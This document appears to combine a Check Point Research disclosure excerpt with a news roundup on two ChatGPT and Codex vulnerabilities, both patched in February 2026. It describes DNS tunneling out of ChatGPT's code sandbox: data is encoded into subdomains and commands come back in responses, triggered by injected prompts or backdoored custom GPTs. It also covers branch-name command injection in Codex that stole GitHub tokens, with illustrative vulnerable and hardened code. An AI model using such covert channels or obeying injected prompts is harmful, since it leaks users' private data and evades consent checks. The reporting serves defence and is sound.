In our case, this mattered because the ChatGPT execution runtime did not permit conventional outbound internet access, but DNS resolution was still available as part of the environment's normal operation. Standard attempts to reach external hosts directly were blocked. DNS, however, still provided a narrow communication path that crossed the isolation boundary indirectly, through legitimate resolver infrastructure.

To exfiltrate data, content could be encoded into DNS-safe fragments, placed into subdomains, and reconstructed on the attacker's side from the incoming queries. To send instructions back, the attacker could encode small command fragments into DNS responses and let them travel back through the same resolution path. A process running inside the container could then read those responses, reassemble the payload, and continue the exchange.

Figure 6 - DNS tunneling flow.

This effectively turned DNS infrastructure into a tunnel between the isolated runtime and an attacker-controlled server. A tunnel created in this way is sufficient for two practical goals: silently leaking selected data from the conversation and maintaining command execution inside the Linux environment created for code execution and data analysis.

Conclusion

Check Point Research reported the issue to OpenAI. OpenAI confirmed that it had already identified the underlying problem internally, and the fix was fully deployed on February 20, 2026. The broader lesson, however, goes beyond this specific case. AI systems are evolving at an extraordinary pace.
New capabilities are constantly being introduced, enabling assistants to solve complex mathematical problems, analyze large datasets, generate and execute scripts, and automate multi-step tasks that previously required dedicated development environments. These capabilities bring enormous benefits. At the same time, every new tool expands the system's attack surface and can introduce new security challenges for both users and platform providers.

Modern AI assistants increasingly operate as real execution environments. They read files, run code, and search the web while processing highly sensitive information such as medical records, financial data, legal documents, and other personal or organizational data. Protecting these environments requires careful control over every possible outbound communication path, including infrastructure layers that users never see.

As AI tools become more powerful and widely used, security must remain a central consideration. These systems offer enormous benefits, but adopting them safely requires careful attention to every layer of the platform.
OpenAI addressed two critical security vulnerabilities in February 2026. Check Point discovered a ChatGPT flaw enabling silent data exfiltration through DNS tunneling, bypassing AI guardrails without user consent. BeyondTrust found a command injection vulnerability in Codex allowing GitHub token theft through malicious branch names, potentially compromising enterprise organizations.
OpenAI patched a critical security vulnerability in ChatGPT on February 20, 2026, following responsible disclosure by Check Point Research. The flaw allowed attackers to exfiltrate sensitive user data without triggering any warnings or requiring user consent, creating what cybersecurity experts described as a dangerous blind spot in AI systems [1].

Source: CXOToday

The vulnerability exploited a hidden DNS-based communication path within the Linux runtime used by ChatGPT for code execution and data analysis, effectively bypassing the platform's built-in AI guardrails designed to prevent unauthorized data sharing [2]. The attack relied on DNS tunneling, a technique that encodes information into domain queries rather than using conventional HTTP or API channels. Because DNS resolution remained available as part of normal system operation, ChatGPT did not recognize this activity as risky behavior requiring user approval [2]. Check Point researchers demonstrated that a single malicious prompt could transform ordinary conversations into covert exfiltration channels, leaking user messages, uploaded files, and other sensitive user data without detection [1].
Source: Hacker News
The vulnerability becomes particularly concerning when considering how users interact with ChatGPT in both enterprise and personal contexts. With OpenAI serving more than 800 million users weekly as of late 2025, and users sending approximately 18 billion messages weekly by July 2025, the potential impact extends far beyond casual chatbot interactions [5]. People regularly upload highly sensitive information, including medical reports, financial spreadsheets, contracts, and confidential business documents, assuming their data remains secure within the platform.

Attackers could mount prompt injection attacks by disguising malicious prompts as productivity hacks or premium feature unlocks, convincing users to paste specially crafted instructions [1]. The threat escalates significantly with custom GPTs, where malicious logic can be embedded directly into the application rather than requiring any user interaction. For instance, a backdoored GPT posing as a personal medical advisor could silently exfiltrate lab results and patient information to attacker-controlled servers [2].

What makes this vulnerability particularly insidious is that attackers don't necessarily need complete documents. ChatGPT's analytical capabilities mean the AI can extract and summarize the most critical insights from lengthy files, potentially leaking condensed versions containing only the most valuable information [5]. This represents not just document theft, but theft of processed intelligence.

In parallel with the ChatGPT disclosure, BeyondTrust's Phantom Labs revealed a separate command injection vulnerability affecting OpenAI Codex, the cloud-based software engineering agent integrated into ChatGPT [3]. The flaw stemmed from improper input validation when processing GitHub branch names during task creation, allowing attackers to inject arbitrary shell commands into the container environment [4].
Source: SiliconANGLE
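This class of bug is easy to reproduce in miniature. The sketch below is not Codex's actual code: it uses a stand-in `echo` command and a hypothetical branch name to show how splicing untrusted input into a shell string yields command execution on a POSIX shell, and how quoting with `shlex.quote` (one standard form of the shell-escaping hardening OpenAI describes) renders the same input inert:

```python
import shlex
import subprocess

def checkout_unsafe(branch: str) -> str:
    """Vulnerable pattern: the branch name is interpolated into a shell
    string, so shell metacharacters in it are interpreted and executed."""
    return subprocess.run(
        f"echo git checkout {branch}",  # 'echo' stands in for the real git call
        shell=True, capture_output=True, text=True,
    ).stdout

def checkout_safe(branch: str) -> str:
    """Hardened pattern: shlex.quote() wraps the whole name in single
    quotes, so constructs like $(...) stay literal text."""
    return subprocess.run(
        f"echo git checkout {shlex.quote(branch)}",
        shell=True, capture_output=True, text=True,
    ).stdout

# A branch name carrying a payload, in the spirit of the reported flaw:
# the $(...) command substitution runs if the name reaches an unquoted shell.
evil = "feature/$(echo PWNED)"
```

An even stronger fix is to avoid the shell entirely and pass an argument vector (`subprocess.run(["git", "checkout", branch])`), so no string is ever re-parsed by a shell.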
Researchers demonstrated they could steal the GitHub OAuth tokens used by Codex to authenticate with repositories, potentially enabling lateral movement within GitHub environments [3]. The vulnerability affected Codex's web interface, command-line interface, SDK, and integrated development environment integrations, creating multiple attack vectors [1].

More alarmingly, attackers could scale exploitation by embedding malicious payloads directly into GitHub branch names, potentially compromising multiple developers working on shared repositories [4]. This expanded attack surface poses significant risks to developer workflows in enterprise organizations where Codex may have broad permissions across multiple projects.
OpenAI addressed both vulnerabilities through coordinated patches deployed on February 20, 2026. For the Codex flaw, the company implemented improved input validation, stronger shell-escaping protections, and tighter controls around token exposure within container environments [4]. Additional measures limited token scope and lifetime during task execution to minimize the potential damage from future exploits.

Crucially, there is no evidence that either vulnerability was exploited maliciously in the wild before disclosure [1]. However, cybersecurity experts emphasize that these incidents reveal a fundamental truth about AI security. "This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," said Eli Smadja, head of research at Check Point Research [1].

The discoveries highlight how AI platforms have evolved into full computing environments handling sensitive data, yet native security controls prove insufficient on their own. Organizations deploying AI systems must implement independent visibility and layered protection rather than relying solely on vendor safeguards [1]. As AI agents become more deeply integrated into enterprise workflows, security teams must treat the containers they operate in, and the input they consume, with the same rigor applied to traditional application security boundaries [4].